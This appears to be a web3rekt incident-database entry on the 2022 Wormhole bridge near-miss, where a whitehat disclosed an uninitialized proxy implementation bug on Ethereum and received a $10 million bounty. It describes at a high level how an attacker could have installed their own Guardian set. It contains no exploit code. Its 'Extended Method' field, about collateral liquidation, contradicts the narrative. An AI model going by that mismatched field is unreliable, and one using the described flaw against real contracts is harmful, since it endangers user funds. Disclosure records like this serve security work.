link.png

ID:

wormhole-1110

Date:

Status:

Incident Count:

February 24, 2022

Near-Miss

2

info.png
target.png
REKT

Contributor:

chain.png

blockthreat.substack.com

KYC By:

KYC:

None

info.png

Audit By:

Audits:

Neodyme AG

Loss Amount:

-

info.png

Recovered:

-

Rewards:

10,000,000

Currency:

USD

info.png

Key Indicators

Platform:

Type:

Category:

Method:

Data Sources:

Multi-chains

Protocol

Bridge

Near-Miss

Extended Method:

Logic error allowing obligation collateral to be liquidated at a quicker pace than the borrow is being repaid.

info.png

Days in Operation:

440

(1.21 Years)

chain.png
chain.png
chain.png
chain.png
datasource.png

Whitehat who goes by the pseudonym satya0x, responsibly disclosed a critical bug in the Wormhole core bridge contract on Ethereum. This bug was an upgradeable proxy implementation self-destruct bug that helped prevent a potential lockup of user funds. This particular responsible disclosure is yet another example of the immense strategic value that running a multi-million dollar bug bounty program can have for Web3 security programs.

Wormhole paid satya0x a record bug bounty of $10 million dollars for the find. It’s one thing to create a program with a really high top payout, but Wormhole has proven that they are very serious about paying top-dollar to help mitigate security issues in partnership with the white-hat community.

Wormhole is using a UUPS style proxy, where the upgrade logic resides in the implementation contract. The main difference is that the upgrade is guarded by Guardians that need to produce a multi-sig message stating the upgrade to the new implementation address is authorized. However, the implementation contract found at 0x736d2a394f7810c17b3c6fed017d5bc7d60c077d was uninitialized after a previous bugfix had reverted the original initialization. That means an attacker would be able to pass their own Guardian set and proceed with the upgrade as a Guardian they controlled.

info.png

DISCLAIMER: While web3rekt has used the best efforts in aggregating and maintaining this database, this web site makes no representations or warranties with respect to the accuracy or completeness of its information and data herein, and specifically disclaim any implied warranties of merchantability or fitness for any particular purpose. 

Under no circumstances, shall web3rekt be liable for any loss of profit or funds, any regulatory or governmental penalties, any legal costs, or any other commercial and non-commercial damages, including but not limited to special, incidental, consequential, or other damages from any or all usage of the data and information derived from this database.